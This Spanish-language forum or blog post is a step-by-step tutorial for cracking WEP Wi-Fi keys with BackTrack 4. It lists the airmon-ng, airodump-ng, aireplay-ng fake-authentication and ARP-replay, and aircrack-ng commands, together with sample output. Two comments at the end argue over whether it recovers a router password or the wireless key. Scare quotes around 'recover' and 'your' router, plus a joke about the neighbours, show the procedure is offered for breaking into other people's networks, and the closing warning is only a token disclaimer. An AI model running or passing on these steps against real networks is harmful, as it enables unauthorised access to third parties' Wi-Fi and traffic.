Back Track 4 es un LiveCD que sirve para "recuperar" la contraseña de "tu" router.
Es del estilo de WifiWay pero usa otros programas parecidos que se ejecutan por medio de comandos.
Aquí os pongo un breve tutorial de WEP:
Arrancamos BackTrack y en el menú de arranque que nos aparece seleccionamos la primera opción.
Cuando nos sale un texto verde que pone algo así: root@bt:~#: ponemos startx y pulsamos intro para iniciar el modo gráfico.
Si no se inicia escribimos login, de usuario escribimos root y de contraseña toor y volvemos a escribir startx
Una vez iniciado el modo gráfico abrimos una terminal pulsando en Konsole en la barra de tareas que tenemos abajo.
Aquí escribimos airmon-ng para ver cual es nuestra interfaz (wlan0, wlan1, ...).
Después ponemos airodump-ng wlan0 (o la interfaz que tengas) para comenzar a escanear las redes.
Una vez hayamos escogido la red a la que queremos "recuperarle" la contraseña apuntamos lo que pone en la columna MAC en esa red que debería tener formato ff:ff:ff:ff:ff y también apuntamos lo que pone en la columna CH, y cerramos la ventana.
Abrimos una nueva terminal y escribimos airodump-ng -w redes -c canal --bssid MAC interfaz
donde redes es el nombre del archivo que atacaremos para conseguir la clave, canal es el canal en el que emite la red que apuntamos antes, MAC es la secuencia de número que apuntamos antes, y donde pone interfaz ponemos nuestra interfaz.
Ejemplo: airodump-ng -w redes -c 6 --bssid 00:4F:20:CD:08 wlan0
Después ponemos aireplay-ng -1 0 MAC interfaz dónde MAC e interfaz son lo mismo que en el comando anterior.
Tras ejecutar éste comando nos debería poner lo siguiente:
Sending Authentification Request (Open System) [ACK]
Authentification succesful
Sending Association Request [ACK]
Association successful :-) (AID: 1)
root@bt~#:
Authentification succesful
Sending Association Request [ACK]
Association successful :-) (AID: 1)
root@bt~#:
Ahora aireplay-ng -3 -b MAC interfaz donde con MAC e interfaz ocurre lo mismo que en el paso anterior.
Dejamos ésto reposar entre 10 y 15 minutos hasta que empiece a hervir.... digooo.... empieza a actuar y cuando comienza en la primera ventana vemos cómo el número de la columna #datas aumenta vertiginosamente y lo dejamos hasta que llegue a 1.000.000.
Cuando se cumpla ésta condición cerramos la última ventana y abrimos una nueva dónde ponemos aircrack-ng nombre_de_archivo.cap donde nombre_de_archivo.cap es lo que pusimos en el comando airodump-ng además de un guión y el número de intento de desencriptación que sea, un ejemplo: aircrack-ng redes-01.cap
Tras ejecutar ésto nos debería aparecer la clave de la red entre instantáneamente y varios días después (suele tardar muy poco).
Lo podéis descargar de aquí: http://www.backtrack-linux.org/downloads/
Aviso: ¡Este software es para recuperar la contraseña perdida de tu router no para liarte a sacarle las claves a todos tus vecinos!
Espero que os sirva ;)
Entradas
ESTO ES UNA MIERDA..
lo primero que dices es..
"Back Track 4 es un LiveCD que sirve para "recuperar" la contraseña de "tu" router."
pero los pasos que dices no tienen nada que ver con la contraseña del router..
sino que es un tutorial mas de como sacar claves wep.
que son las claves de la señal inalambrica
y que son independientes de la clave del router.
Quizá no esté bien expresado, a lo que me refiero es a recuperar la contraseña de la red Wi-Fi del router.
Y no llames mierda a éste tutorial pues tiene un trabajo detrás, aunque tú no lo hayas visto...